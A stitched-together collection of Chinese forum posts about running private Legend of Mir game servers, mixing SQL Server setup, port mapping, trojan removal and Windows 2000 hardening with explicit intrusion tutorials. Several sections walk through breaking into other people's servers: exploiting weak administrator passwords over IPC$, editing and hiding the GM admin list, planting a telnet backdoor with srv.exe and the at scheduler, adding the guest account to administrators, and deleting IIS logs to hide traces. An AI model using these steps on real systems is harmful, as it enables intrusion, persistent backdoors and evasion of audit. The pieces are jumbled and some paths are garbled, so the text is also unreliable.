二.企业管理器的使用
点击“开始”－“程序”，在“Microsoft SQL Server”菜单中打开“企业管理器”。在企业管理器中，右键单击“SQL Server组”，选择“新建SQL Server注册”。             
在属性窗口中选择“高级”选项卡，将“登录超时”的数值设置为0。按照上面说的把远程数据库就已经连上了
此时会出现SQL Server属性窗口，在“服务器”中填入您网站的域名，选择“使用SQL
Server身份验证”，“登录名”和“密码”分别填入主机开通邮件中的用户名和密码，然后点击“确定”。             
连接成功后，你会看到“SQL Server组”中多了一个名称为您网站域名的服务器。此时，您就可以像操作本地SQL数据库一样管理网站数据库了。
 

别搞错,可不是众GM里的哪一位,而是来自其他私服里的GM,其实攻击的方法也很简单,具体如下:

首先: 攻击者自己开个传奇服务器,把开启6000端口的私服IP写到DBAddr=这里.
其次: 启动这个单机的服务器,在对方的服务器里面申请一个帐号,建立一个名字(此账号是高级管理员号)
再次: 对方会去他想要黑的私服里(那就是你的咯)也注册一个一样的名字和ID(这里很重要!!不然对方进自己的站是黑屏的,哈哈...)
最后: 然后在对方自己的单机服务器上刷东西(小退很重要目的是把你刷出装备的数据写入他的DB),刷出来的东西就保存到对方想黑的服务器的同名数据库!!

以下是攻击者的*:\MirServer\Mir200\!setup.txt

[Server]
ServerIndex=0
ServerName=入侵私服
ServerNumber=0
VentureServer=FALSE
TestServer=TRUE
TestLevel=7
TestGold=100
TestServerUserLimit=1000
ServiceMode=FALSE
NonPKServer=FALSE

;192.168.1.9(本机)IP (202.92.165.***)攻击者想要黑的IP(条件6000端口开着的)
DBAddr=202.92.165.22 (文章就在这里,这里是写对方要黑的IP)
DBPort=6000
IDSAddr=192.168.1.9
IDSPort=5600
MsgSrvAddr=192.168.1.9
MsgSrvPort=4900

由于对方攻击时只能默认你是6000端口(除非你被他知道你的端口),所以解决就很简单啦
解决办法如下:
1.封闭服务器6000端口(本站下载区提供了安全策略)
2.更改数据库6000端口 [推荐第一种办法]

第二：设置本地安全属性。
            策略的目的，阻止非本地访问
            TCP端口4900，5000，5100，5500，5600，6000，
            会设置的自行修改。
            如果不会设置，
            win2000的安全策略我已经设置好，
            把设置倒进你的本地安全里。

关于远程端口的问题：

Windows 2000系统中的远程终端服务是一项功能非常强大的服务，同时也成了入侵者长驻主机的通道，入侵者可以利用一些手段得到管理员账号和密码并入侵主机。下面，我们来看看如何通过修改默认端口，防范黑客入侵。

　　众所周知，远程终端服务基于端口3389。入侵者一般先扫描主机开放端口，一旦发现其开放了3389端口，就会进行下一步的入侵，所以我们只需要修改该务默认端口就可以避开大多数入侵者的耳目。

　　步骤：打开“开始→运行”，输入“regedit”，打开注册表，进入以下路径：[HKEY_LOCAL_MACHINE\SYSTEM\

　　CurrentControlSet\Control\Terminal Server\

　　Wds\rdpwd\Tds\tcp]，看见PortNamber值了吗？其默认值是3389，修改成所希望的端口即可，例如6111。

　　再打开[HKEY_LOCAL_MACHINE\

　　SYSTEM\CurrentContro1Set\Control\Tenninal Server\WinStations\RDP\Tcp]，将PortNumber的值（默认是3389）修改成端口6111。

　　修改完毕，重新启动电脑，以后远程登录的时候使用端口6111就可以了

wsock32.dll是Windows Sockets应用程序接口，用于支持很多Internet和网络应用程序。
很不幸的你 你中毒了

“cmcc.exe”恶性盗号木马软件。

清除方法

一、请先去把系统设置为“显示隐藏文件”，因为病毒以隐藏属性伪装，不做此设置将无法看到它，设置的方法如下（如果系统已经做了此设置可以跳过这一步）：

打开“我的电脑”；
依次打开菜单“工具/文件夹选项”；
然后在弹出的“文件夹选项”对话框中切换到“查看”页；
去掉“隐藏受保护的操作系统文件(推荐)”前面的对钩，让它变为不选状态；
在下面的“高级设置”列表框中改变“不显示隐藏的文件和文件夹”选项为“显示所有文件和文件夹”选项；
去掉“隐藏已知文件类型的扩展名”前面的对钩，也让它变为不选状态；
最后点击“确定”。

二、按“Ctrl+Alt+Del”键弹出任务管理器，找到ctfmon.exe和svchost64.exe进程，找到它后选中它并点击“结束进程”以结束掉木马进程。然后迅速做下面一步，只所以要迅速是因为如果动作慢的话，木马可能会自动恢复而再次运行起来，这样就无法删除掉其他木马文件了；

三、
删除注册表中的

HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run\ctfmon.exe

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\svchost64.exe

如果没有就找有什么特别的项,然后删除，

删除文件 (在DOS下删除)
打开“开始/运行”，输入“cmd”后“确定”以打开DOS窗口
C:\WINNT\svchost64.exe
C:\WINNT\system32\ctfmon.exe

查找所有的 wsock32.dll 然后全部删除,
c:\winnt\system32\wsock32.dll
的删除不了，可以不理它。

重新启动就OK了。

利用npc复制，必须要有同样的npc的名字。比如说万事通。假如你的服务器上有10个名字叫万事通这样的npc。我就可以复制出10个一样东西．而且复制的东西，可以交易，可以拿在手上。可以放在场库。但有一点就是不能同时放在包里。其实有如果同时放在包里。包里只会显示一把。但2把。假如你现在手上有把刀为a．包
里有把和手上一样的刀我们这为b，我把a取下来放在包里。这时包里只会显示一把武器。是a或是b。然后把包里的那把武器在拿在手上。下线上线包里那把消失了的武器，又出现了。

②.具体解决办法:

体解决办法。大家把所有的npc文件。。记住所有的。。不要取一样的名字。。只是显示在游戏中的名字。不要取一样的。。就可以避免这个BUG/相信大家都有这个BUG。快按我说的方法
改掉。。
补充一下和Market_Def．Npc_Def．Market_Saved...Market_Prices这几个文件夹里面的名字无关．只和MerChant.txtNpcs.txt两个文件中自我定义的NPC显示名称有关

苍月岛书店5138311书店老板020
盟重省_书店01611116书店老板020
这里的书店老板　不可以取一样的名字．比如仓月就叫仓月书店老板
土城的就叫土城书店老板

　　1 X-SCAN扫描IP 看看谁是弱口令（IP也非常容易得到，私服都有，弱口令就是用户名和密码都是系统默认的，没有改。）

　　2 打开DOS系统 在DOS下进行*作！

　　c:/>net use \\192.168.0.1\ipc$ /user:administrator 进入对方计算机USER进入的就是管理员用户。

　　进入了以后就好办了，可以找你要黑的私服！做GM也好，搞破坏删除也好，比如做GM吧！

　　c:/>copy \\192.168.0.1\d$\mirserver\mir200\envir\adminlist.txt 都是命令，可以看出来，其余的想怎么改就凭你了，但是我得解释一下！！这段代码目的很简单就是将D盘拷贝一个传奇GM的列表，你可以把你自己添加进去在编辑！

　　c:\>edit \\192.168.0.1\d$\mirserver\mir200\envir\adminlist.txt

　　这样就可以了。这是利用弱口令进入计算机的方法！！当然了还有更多的方法。

　　我在讲讲我的 ** 传奇的遭黑的经历！

　　首先，就是鼠标乱动，很明显就是被人控制了，分析如下：1，中木马，2远程控制！

　　其次，有文件覆盖的对话框，计算机被突然重新启动！！分析如下：1，破坏系统，2，对传奇的控制！3，从新启动是为了黑客的设置生效！

　　再次，有非法GM制造物品，以被查出。分析如下：是针对传奇而来！

　　解决办法：用杀毒软件杀毒，最好在DOS下进行！2，是2000的漏洞太多，查找无用的端口，并关闭3389等，下载 2000 SP3 的补丁！在控制面板中选本地用户和组中关闭GUEST帐号！和 IUSR （计算机名）INTNERNET来宾帐号关闭（我的传奇就是黑客利用这个号进入计算机的），修改超级管理员用户名与密码！ 在关闭远程访问等功能，另外，进攻传奇主要是GM列表，我同样也中过，现象是这样的，打开AdminList.txt文件，没有发现多的GM，利用CTRL-A看看有没有多余的GM，另外仔细一看，在看AdminList.TXT的文件名后面有没有空格，设置文件全部显示，会发现是否多了一个隐藏GM列表文件，这也是屡进不止的发现有非法GM的原因.黑客进攻我的计算机是用了2个小时就被我发现了，立即做了相应的修改，恢复了传奇的正常运行，至今为止，仍然有人进入我的来宾帐号的警告，但是已经进不来了！传奇也步入了正常的运行当中！

　　虽然我写了一些如何进攻和防御计算机的方法和解决办法，我自己也觉得有点自相矛盾的想法，但是我的目的很是简单，希望能够帮助你解决你的问题！提高自己计算机的安全

　　如何在别人的私服做GM?

　　攻击初级教学

　　我在侵入别人4f所使用的方法

看到有些4f做的不错，但是进去又不是很有钱，也没装备，高手也很多，一直不喜欢在里面当菜鸟的我，一口气进入他们的服务器端大闹一番之后。当足了gm的瘾，现在我把方法公布与大家。。。。
　
　　其实我所使用的方法很简单，只有４个工具：
　
　　（一）：shed.exe

　　（二）流光2000

　　（三）cmd.exe (其实就是２０００下的dos啦)！
　
　　（四）冰河8.4 操作系统：win2000 server 或者winxp系统。 “shed.exe”:其实就是用来网上查共享资源的，速度快，可以查到很多服务断的共项文件，不过在这里面有些ｉｐ在浏览器中无法访问，这是因为其中也包含了个人上网的ｉｐ．呵呵！一些作网站，网吧的服务器一些目录都是共享的，有些是可以访问，但是不能删除，因为你所访问的都是以匿名访问的，所以权限不够！有些需要密码。遇到密码怎办？用流光！ “流光”虽说对202作了限制，但是对小日本的ip可是没有限制的，呵呵！所以说使用流光的ipc探测，建立一个空对话，查到用户列表，然后先简单探测，此时有些网管懒惰，把administrator设置的过于简单，呵呵，你就可以抓到了。
　
　　下一步如何做呢？也许在你查对方的端口时发现对方开的端口很少，比如ftp没开，怎办呢？冰河！ “冰河”，想必许多朋友都玩过，使用冰河控制一台服务器速度很快，（因为服务器那边带宽很大）几分钟就可以查到对方主机的主页所在位置。但是如何上传并且控制他呢？ “cmd.exe” 是２０００下的ｄｏｓ了，执行cmd.exe 使用net命令，
　入侵传奇私服/充当非法GM

　　首先，我得声明，我写本文并不是教大家如何去黑4f，只是想以本文引起广大4f拥有者的注意

　　，提高自己的网管水平。

　　我爱玩游戏，但却玩得很菜，也没有时间去玩，只想玩着过瘾，所以，当我开始玩传奇时，

　　虽觉得是好玩，但玩盛大的简直是在受罪，升级慢，没好装备，处处受人欺负。所以，4f是明

　　智的选择，但进去时也没有好装备，也是受人欺负，难道我不可以做gm？试试，folling me！

　　找来一大堆4f的ip，开个x-scan扫吧。有了，还真不少，都是弱口令的，这些网管真菜呀。

　　选好一个，192.168.0.1，go！

　　打开cmd，

　　1）c:/>net use 192.168.0.1ipc$ /user:administrator

　　连接成功，

　　ok，连上了，成功在望，

　　2）c:/>copy 192.168.0.1d$mirservermir200enviradminlist.txt

　　系统找不到指定的文件。

　　没有？不可能吧？唔，一定是隐藏了，没关系，再来，

　　3）c:>attrib -r -h 192.168.0.1d$mirservermir200enviradminlist.txt

　　没有提示，成功了，

　　这次连复制也不用了，直接改吧

         4）c:>edit 192.168.0.1d$mirservermir200enviradminlist.txt

　　会打开个介面，看看里面有哪些gm，加个吧，自己记得就行了，改完保存退出

　　5）c:>attrib +r +h 192.168.0.1d$mirservermir200enviradminlist.txt

　　把adminilist.txt还原成只读隐藏，

　　好了，大功告成，快打扫脚印吧，别让人发现被入侵了，

　　现在，就等着系统重启了，等不及的话就在第五步让它重启，不过这样太危险了，还是等吧，

　　第二天注册个帐号，新建个之前加的人名进去，

　　/who

　　当前150人在线

        目前在黑客横行的互联网空间中，利用IIS的漏洞，提申自己的权限，而成为AD，这些只是轻而易举的事情，这不需要花几天的时间去暴力破解一下口令，像自己架设的WEB服务器有种情况，更是数不甚数了.关于怎利用UNICODE漏洞去提供AD权限的文章，网上太多了，我就不多讲了.

　　这些来说应该是服务器安全防范方面的一个例子而已，真正要做到服务器的安全运行，需要你花大量的时间去摸索.因为这些来说，足以应付一些无聊的.....当然了，你如果需要WEB服务器，我还是建议你去使用AP了.他的源代码开发，免费，安全性稳定性都比IIS强得多了.

　　哈，我就是gm了。赶快把自己升级，

　　@level -1

　　升级成功，255级，哈哈

　　再造出想要的装备，想要什么尽情造吧，

　　重复上面的把自己从adminlist.txt里删了，哈哈，好装备到手了，可以玩了

　　面记得有位朋友对加强对服务器安全性的解决方法进行了一系列的说明，讲得非常详细，但是我觉得还有很多需要补充的地方.微软的系统是漏洞和补丁著称，真正要对服务器的安全配置确实非常困难，考虑的方面也太多了.

　　今天先讲一个方面的内容了，也算是对前面的朋友的进一步补充吧！

　　前面那位朋友所概述的主要是针对WIN2000系统弱口令的安全设置！他已经说得很仔细了，做到那些，口令这一关差不多了.确实在互联网的时代，口令真的非常重要.我对国外的主机进行了一系列的测试，就拿有弱口令的系统来说，还有不少！其中也包括了不少中小型企业的WEB服务器，E-MAIL，PROXY服务器都有这种低级的错误！

　　如果说你在这方面做得非常的仔细.但你至少还要仔细研究一下你主机现在所运行的有哪些服务，这些服务代表着什么?你应该很清楚！因为现在黑客软件，木马工具，远程控制软件大多是以一种服务的形式运行在你的服务器系统里，一般的防火墙，杀毒软件对其并没有任何反映的.对于服务形式出现的控制工具.比较难得发现，所以你就必须在服务器里运行的哪些服务非常熟悉.对于陌生或奇怪的服务应该安全设置好.

　　下面我都WIN2000的WWW(IIS)服务器安全配置略讲一下，WWW服务在WIN2000SERVER，ADSERVER，DATACENTERSERVER，版本中是默认安装的，如果你不需要用2000的WWW服务的话，建议不要安装.至于添加/删除你可以控制面板的去掉他的安装，或者在管理工具/服务里设置WORD WIDE WEB SERVICE启动类型为手动/禁用

　　这样的话系统就不默认启动改服务！

　　如果你需要用IIS来建站宣传一下自己的私服，你就必须按以下方法安全配置好IIS，

　　在IIS组件你首先要去掉你不需要的SMTP，SNNP，FTP，这样的话你可以降低你服务器运行所占用的CPU资源，和内存使用率.然后建议你删除你C:\INTERPUB\目录下的所有内容！或者更改路径.在IIS管理器中删除默认站点，(或者删除SCRIPTS这个虚拟目录)因为这个目录有可写的权限的.在新建的WEB站点中，设置IIS的权置，必须让它不能写入，或运行.因为IIS是默认支持ASP脚本的.然后在IIS中删除不需要的映射，这个很重要.如果你要支持PHP，CGI脚本的话，你还得配置好PHP.CGI的应用程序的正确映射，禁用或删除FSO组件，(去年深圳之窗就是被人家利用FSO黑了......)如果你要使用FSO的话，最好要改名！否则的话，你给别人提供主页上传的话，你肯定是会被黑的。小心呀
 

有很多朋友做好了4F想把它上到外网，但是不知道怎么上传自己的4F，有的上传了不是不开门就是进去黑屏，
要么就外网上去了内网上不去，这是针对在主机上运行3个文件而言的，现在我教大家一个简单的方法，下面给大家详细解答下：
你的4F主机是WIN98也号200SERVER也好，这个不关紧要，首先我先给大家讲解网吧上网服务器的大概构造。上网服务器一般是屏蔽所有端口的
而我们的4F用的是7000 7100 7200 我们用PORTTUNNEL这软件去打开它即映射，在我们的网吧上网服务器上运行PORTTUNNEL别的不用，PORTTUNNEL这个软件是连接外部
的一个软件，用他映射可以把你的主机连接外部，让外部人可以进到你的主机上，但是你们不用担心，外部人进来的只是你的4F主机，不是你的上网服务器。对上网服务器没影响。
有的网吧上网服务器屏蔽主页，也就是上不了Internet 也连接不了局域，这是在安装服务器的时候管理员设置的，没关系，只要我蒽拿来密码注销下输入帐号密码就可以，把里面的设置该下。映射好了在该回来。

然后照我的这样做在网吧主机上装PORTTUNNEL然后照着这样做好7000 ，7100 ，7200三个端口的映射以下
三步，每步所做的其实差不多
（1）
名字里填7000
输入端口填7000
捆绑地址填你主机的IP，也就是PORTTUNNEL，所在机子的IP
输出端口填7000
输出地址填你要映射的局域网地址如192.168.0.79，也就是你私服所在的机子的IP
(2)
名字里填7100
输入端口填7100
捆绑地址填默认值（选你的网吧主机IP)
输出端口填7100
输出地址填你要映射的局域网地址如192.168.0.79，也就是你私服所在的机子的IP
(3)
名字里填7200
输入端口填7200
捆绑地址填你主机的IP，也就是PORTTUNNEL，所在机子的IP
输出端口填7200
输出地址填你要映射的局域网地址如192.168.0.79，也就是你私服所在的机子的IP
然后点开始。。。。。。（激活）
私服主机的文件修改如下
mud2\DBSrv200\!addrtable
的内容改如下
192.168.0.141　　 218.65.221.48
私服主机IP　　　　 网吧主机IP
mud2\DBSrv200\!serverinfo 的内容改成
192.168.0.141　　 218.65.221.48　　　　 7200　　
私服主机IP　　　　　　 网吧主机IP　　　　　　 端口不变

还有mud2\Logsrv\!addrtable
改为
;Server　　　　Title　　　　 Remote　　　　 Public　　　　 Gates...
ktest Line1-7　　192.168.0.141　　 61.157.208.163　　 61.157.208.163:7100
　　　　　　　　私服主机IP　　　　 网吧主机IP　　　　　　 网吧主机IP　　 端口不变

OK了，你就可以把网吧的主机修改回来。然后回到4F主机192.168.0.79上了，开servercontrol输入192.168.0.79就好了
这样全世界都能玩你的4F了。照我说的做可以解决外网进入黑屏和外网能进内网上不去的问题，还有只有本市可以玩外地上不了等等，别的可能我就不知道了 希望成功的朋友别忘了上来帮我顶下，别看了不顶，帖子沉了
后面不会的可就看不到了~
此贴希望斑竹固定。让后来的朋友学习下 有不懂的本人留下QQ加本人详细告诉你们
254097975 说明4F爱好者通过路由器SF上网设置方法

路游上外网设置
先打开你路由器设置界面，里面有一项是Virtual Server
填写端口：7000
IP：192.168.0.79（SF程序所在的机器IP）
填写端口：7100
IP：192.168.0.79（SF程序所在的机器IP）
填写端口：7200
IP：192.168.0.131（SF程序所在的机器IP）
设置好重启动路由器
2.传奇分机程序IP设置方法
A.例如公网IP是218.* * * *
B.例如分机IP是192.168.0.79
D:\mirserver\mud2\DBSrv200\!addrtable.txt
的内容改如下
192.168.0.79 218.* * * *
私服主机IP 网吧主机IP
192.168.0.131 218.15.58.138 7200
私服主机IP 网吧主机IP 端口不变

还有D:\mirserter\mud2\Logsrv\!addrtable.txt
改为
;Server Title Remote Public Gates1 Gates2... (这里大家看好)
绿色传奇 Line1-7 192.168.0.79 218.* * * * 218.* * * * :7100(端口不变)
私服主机IP 网吧主机IP 私服主机IP 端口 网吧主机IP 端口

但是好多朋友发现这样外网能进。内网不行（不开门，郁闷。。那网吧架私服有何用？－－－为人民服务？晕！！）

大家这样改：
D:\mirserver\mud2\DBSrv200\!addrtable.txt
的内容改如下
192.168.0.79 218.* * * *
私服主机IP 网吧主机IP
D:\mirserver\mud2\DBSrv200\!serverinfo.txt 的内容改成
192.168.0.79 218.* * * *7200
私服主机IP 网吧主机IP 端口不变

还有D:\mirserver\mud2\Logsrv\!addrtable.txt
改为
;Server Title Remote Public Gates1 Gates2...
绿色传奇 Line1-7 192.168.0.79 218.* * * * 192.168.0.79
:7100 218.* * * *:7100
私服主机IP 网吧主机IP 私服主机IP 端口 网吧主机IP 端口
我也是实验验证。这样改后外网可进。但要登陆两次（好烦！！）。内网能
开门，能建人物，但选人物进游戏黑屏（哎 而且也要登陆两次
（估计是这有两个端口的问题－－－－绿色传奇 Line1-7 192.168.0.79 218.* * * * * 192.168.0.79:7100 218. * * * * *:7100）
－－－－－－－－－－－－－－－－－－
说了半天，那到底是什么问题？其实就是路由器的问题。你的路由器有问题。你在
改什么ip都没用。路由器好的话，你不用改来改去的，简单的设一下端口映射，原来用软件映射的私服主机都不用动就可以了。(次方法论坛有好多）

拿现在常见的tp-link路由器来说。我试了全部产品结果如下，希望有用。

一。行的：
1. tp-link r400 --------- 停产（呵呵）
2. tp-link r400+ --------- 好用的很，有不贵，不过带的网吧工作机不能大于50 台。个人认为性价高。

二。不行的：
1. tp-link r410 --------- 扔了吧。嘿嘿！！
2.tp-link r420 ----------早就可以扔了。（什么！你就买的这个？我倒）

三。可以挽救的。
1.tp-link r460 ------好东西呀。又不贵。可惜呀。不过不要急！！
2.tp-link r480 -------好贵呀！！不过对大网吧还是用这个。个人完全推荐这个，这个可是质的飞跃。（不过这个做私服也不行！倒。那你还推荐？不急，往下看就知道了。）

如果做私服的朋友不幸买到第二种。我无能为力（扔!!),买到第三种，那你就可以高兴一下。本人提供二个补丁给你们。一升级就好了！！（谢谢我？）

－－－－－－－升级前记得去tp-link看看升级方法。错了可不要骂我呀。。。

测试你的路由器能否建私服（内外网）

好多朋友老被路由器架设私服的问题困扰。在私服的主机上做了许多，发现不能用。其实你需要知道你的路由器可行。不然不是好冤呀！
跟我来做：
1。在路由器上映射21端口到一台装2000的机子（假设ip为：192.168.0.20）。（如果要选协议类型的话选all或tcp，做cs的话要udp呀，不过cs不用21的。而是用什么2701x－－－题外话，呵呵！！）
2.在2000的机子上安装ftp，设好。（什么，你不会？我倒！）
3.在其他的机子的ie上输入“ftp://192.168.0.20";;;,后能看到2000机子你设的目录，恭喜你，你ftp弄好了。
4.开始试你的路由器了（别心跳太快, 心脏病发了不要打我哦。。。）
假设你外网ip为61.241.158.165，那你就在刚才的机子上的ie输入”ftp://61.241.158.165";;;, 同样能打开2000的你设的目录的话。恭喜。你的路由器可以做私服。如果出现什么“阅读文件夹发生错误”之类。抱歉，你路由器不能做私服，请去升级路由器的固件（有危险的，请考虑。。。），升级后还不行的话，请找厂商（就问你们的xxx路由器内网的电脑能不能通过外网ip访问建在内网的www服务器。－－－**，我直接问不就得了？倒，我这长途好贵！！），厂商说no得话
，你就死了这分心了。。。
 

1.物理安全 服务器应该安放在安装了监视器的隔离房间内，并且监视器要保留15天以上的摄像记录。另外，机箱,键盘，电脑桌抽屉要上锁，以确保旁人即使进入房间也无法使用电脑，钥匙要放在另外的安全的地方。

2.停掉Guest 帐号 在计算机管理的用户里面把guest帐号停用掉，任何时候都不允许guest帐号登陆系统。为了保险起见，最好给guest 加一个复杂的密码，你可以打开记事本，在里面输入一串包含特殊字符,数字，字母的长字符串，然后把它作为guest帐号的密码拷进去。

3．限制不必要的用户数量 去掉所有的duplicate user 帐户, 测试用帐户, 共享帐号，普通部门帐号等等。用户组策略设置相应权限，并且经常检查系统的帐户，删除已经不在使用的帐户。这些帐户很多时候都是黑客们入侵系统的突破口，系统的帐户越多，黑客们得到合法用户的权限可能性一般也就越大。国内的nt/2000主机，如果系统帐户超过10个，一般都能找出一两个弱口令帐户。我曾经发现一台主机197个帐户中竟然有180个帐号都是弱口令帐户。

4．创建2个管理员用帐号 虽然这点看上去和上面这点有些矛盾，但事实上是服从上面的规则的。 创建一个一般权限帐号用来收信以及处理一些*常事物，另一个拥有Administrators 权限的帐户只在需要的时候使用。可以让管理员使用 “ RunAS” 命令来执行一些需要特权才能作的一些工作，以方便管理。

5．把系统administrator帐号改名 大家都知道，windows 2000 的administrator帐号是不能被停用的，这意味着别人可以一遍又一边的尝试这个帐户的密码。把Administrator帐户改名可以有效的防止这一点。当然，请不要使用Admin之类的名字，改了等于没改，尽量把它伪装成普通用户，比如改成：guestone 。

6．创建一个陷阱帐号 什么是陷阱帐号? Look!>创建一个名为” Administrator”的本地帐户，把它的权限设置成最低，什么事也干不了的那种，并且加上一个超过10位的超级复杂密码。这样可以让那些 s cripts s忙上一段时间了，并且可以借此发现它们的入侵企图。或者在它的login s cripts上面做点手脚。嘿嘿，够损！

7.把共享文件的权限从”everyone”组改成“授权用户” “everyone” 在win2000中意味着任何有权进入你的网络的用户都能够获得这些共享资料。任何时候都不要把共享文件的用户设置成”everyone”组。包括打印共享，默认的属性就是”everyone”组的，一定不要忘了改。

8.使用安全密码 一个好的密码对于一个网络是非常重要的，但是它是最容易被忽略的。前面的所说的也许已经可以说明这一点了。一些公司的管理员创建帐号的时候往往用公司名，计算机名，或者一些别的一猜就到的东西做用户名，然后又把这些帐户的密码设置得N简单，比如 “welcome” “iloveyou” “letmein”或者和用户名相同等等。这样的帐户应该要求用户首此登陆的时候更改成复杂的密码，还要注意经常更改密码。前些天在IRC和人讨论这一问题的时候，我们给好密码下了个定义：安全期内无法破解出来的密码就是好密码，也就是说，如果人家得到了你的密码文档，必须花43天或者更长的时间才能破解出来，而你的密码策略是42天必须改密码。

9.设置屏幕保护密码 很简单也很有必要，设置屏幕保护密码也是防止内部人员破坏服务器的一个屏障。注意不要使用OpenGL和一些复杂的屏幕保护程序，浪费系统资源，让他黑屏就可以了。还有一点，所有系统用户所使用的机器也最好加上屏幕保护密码。

10． 使用NTFS格式分区 把服务器的所有分区都改成NTFS格式。NTFS文件系统要比FAT,FAT32的文件系统安全得多。这点不必多说，想必大家得服务器都已经是NTFS的了。

11．运行防毒软件 我见过的Win2000/Nt服务器从来没有见到有安装了防毒软件的，其实这一点非常重要。一些好的杀毒软件不仅能杀掉一些著名的病毒，还能查杀大量木马和后门程序。这样的话，“黑客”们使用的那些有名的木马就毫无用武之地了。不要忘了经常升级病毒库

12．保障备份盘的安全 一旦系统资料被破坏，备份盘将是你恢复资料的唯一途径。备份完资料后，把备份盘防在安全的地方。千万别把资料备份在同一台服务器上，那样的话，还不如不要备份

@testga
@gsa
@AddGuild
@DelGuild
@DisableFilter
@ReloadGuild - reload guild
@ReloadGuildAll - reload all guilds
@ReloadLineNotice - reload line notice
@ReloadAdmin - reload GM list
@ReloadNpc - reload merchant npc in sight
@ReloadDiary - reload quest diary
@ReloadMonItems - reloads drop files
@ReadAbuseInformation - reloads !abuse.txt
@Flag - @flag user_name number_of_flag
@ShowOpen - @ShowOpen user_name number_of_unit
@ShowUnit - @ShowUnit user_name number_of_unit
@setflag - @setflag user_name number_of_flag set_value (to test quests)
@setopen - @setopen user_name number_of_unit set_value
@setunit - @setunit user_name number_of_unit set_value
---------------------------------
以后添加GM 不用(*) 就不会有问题
上面超级GM调试权限对不是技术测试人员基本用不着
 

一、WINDOWS系统口令入侵

对于WIN2000/NT系统的口令入侵已讲得太多，我也不愿意将旧的故事一遍又一遍的重提。一般来说，这类入侵具体有这么几种手法：1、通过IPC$口令破解入侵；2、利用Unicode漏洞尝试入侵；3、利用开放终端服务和输入法漏洞入侵；4、利用IIS远程溢出漏洞入侵；5、利用SQL弱口令入侵。下面我简要介绍这5种入侵过程，看完后你会发现，原来进入远程系统是如此容易。

1、IPC$入侵：IPC$是指进程间的通信，win2000/NT主机之间通过它来实现数据交换。而利用这一特征还在于2000/NT系统有一个默认的隐藏共享，这个共享被设计的初衷是为了方便管理员远程管理操作系统的，现在却被黑客拿来实现他们的目的。

开启流光，选择“探测->扫描POP3/FTP/NT/SQL主机”，在“开始地址”和“结束地址”里都填入目标地址：192.168.4.95，在“扫描主机类型”下拉菜单里选择“NT/98”，点“确定”开始扫描。

经过几秒钟后，192.168.4.95 这台主机就出现在左边的主机类型“IPC$主机”里。选择这台主机，点击右键，在弹出的下拉菜单里选择“探测->探测IPC用户列表”。

开始探测，只要用户的密码字典里包含目标主机的密码，则流光迟早能探测出来，探测时间的长短取决于用户的密码字典大小和攻击机器的运行速度；典型的黑客字典都有十几兆大小，这样探测起来就需要很长（可能是几天）的时间。经过几分钟的探测后，我们发现，流光已成功的探测到了目标主机的三个密码，其中包括系统管理员Administrator密码：cell.

好了，有了目标主机的系统管理员密码后，这台主机就已经完全控制在我们手中了。下面说明如何利用流光探测到的密码从IPC$入侵主机.

开DOS窗口，先PING一下目标主机：192.168.4.95，看看TTL值为128，可以判定这台主机为NT/WIN2000系统了，正是我们所要。用如下命令：

c:\>net use \\192.168.4.95\ipc$ “cell” /user:”administrator”

提示：命令运行成功。已经成功的和目标主机建立连接。

复制一个Telnet程序上去(小榕流光安装目录下的Tools目录里的Srv.exe) ，这个程序是在目标系统上开一个Telnet服务，端口是99。

c:\>cd tools

c:\>tools>copy .\srv.exe \\192.168.4.95\admin$\system32

admin$是ＮＴ的默认的隐藏共享，他对应的是ＮＴ安装目录里的system32目录．通常是在c:\winnt\system32，你也可以用C$ , D$ 他们分别代表盘符C盘，D盘．都是系统的默认共享。

显示：已复制    1个文件。文件复制成功。

下面我们需要远程启动这项服务，利用WIN2000的SCHEDULE（定时）服务来启动这个程序。先看一下目标系统的时间：

c:\>net time \\192.168.4.95

显示：

\\192.168.4.95的当前时间是2001/10/22上午10：00

命令成功完成。

下面设定目标系统的TELNET服务在指定时间内启动，用at命令：

c:\>at \\192.168.4.95 10:02 srv.exe

显示：

新加了一项作业，作业ID=1。

说明命令成功执行，下一步就等到服务启动后TELNET上去。

2分钟后，可以TELNET了：

c:\>telnet 192.168.4.95 99

（srv.exe开的端口是99.这里我们就telnet 192.168.4.95 99）

这个程序好在不用输入口令和没有日志记录．但是每一次使用后都会自动关闭，下次要用时要重新启动，才能再用。

我们看到如下界面：

Microsoft Windows 2000 [version 5.00.2195]

<c>版权所有 1985-2000 Microsoft Corp.

C:\WINNT\system32\>

这样，我们就成功的登陆上去了。

由于我们已经是系统的管理员，所以有权在目标主机上做任何事，包括创建文件、删除文件、给文件该名、创建、删除用户帐号等。至此，目标系统再无任何安全可言。

当然，我们还可以以目标系统为跳板，进一步入侵别的系统。

另开一个DOS窗口，先复制TOOLS目录下的另一个文件NTLM.EXE上去：

c;\tools\>copy .\ntlm.exe \\192.168.4.95\admin$\system32

这个程序是用来改变WIN2000 TELNET SERVER 的身份验证方式，将其改为明文验证。

回到前一个DOS窗口，执行NTLM：

C:>ntlm

有提示字符显示命令成功完成。

然后我们重启一下TELNET 服务，用如下命令行：

c:\>net stop telnet

然后再：

c:\>net start telnet

提示：

TELNET 服务已经成功启动。

这样，你就可以以它为跳板，入侵别的主机了。

再次登陆本身：

C:\>telnet 192.168.4.95

要求输入用户名和口令。输入用户名administrator和 口令：cell，回车后登陆成功了。到此为止，我们已经完全取得了目标系统的控制权，一次入侵成功。

我们希望黑客到此为止就罢手了，可是他会罢手吗？不会。他还会在系统里留下几个后门，这样就算管理员密码被改了他也可以利用自己设置的后门进到系统。通常的，他会把系统guset帐号激活并加入管理员组，在TELNET终端下输入如下命令：

c:\>net user guest /active:yes

c:\>net user guest 1234

c:\>net localgroup administrators guest /add

这样他下次就可以用guset用户名，密码1234以系统管理员身份登陆了。

当然，不要忘了擦除痕迹，把c:\winnt\system32\logfiles\w3svc1\下的文件都给删了吧。

要防止这类入侵，第一是要将系统密码设置得复杂一些，不要使用生日和常用字符作为密码，而使用字母和数字的组合如lo3v4e之类的密码则普通的流光探测就无能为力了。第二是更改注册表，禁止建立空连接和禁止管理共享。

2、Unicode漏洞入侵：

这类入侵在网上提得实在太多了，我也没心思写出更好的教材，下面转一篇：

首先我们来看看这个漏洞的原理。
在中文版的IIS4，和ISS5中，存在一个BUG，原因是UNICODE编码 存在BUG 在UNICODE 编码中，发现了一个奇怪的编码方式，
例如：
%c1%hh %c0%hh (0x00〈= 0xhh 〈 0x40)
IIS 把 "%c1%hh" 编码成
(0xc1 -0xc0) * 0x40 + 0xhh.
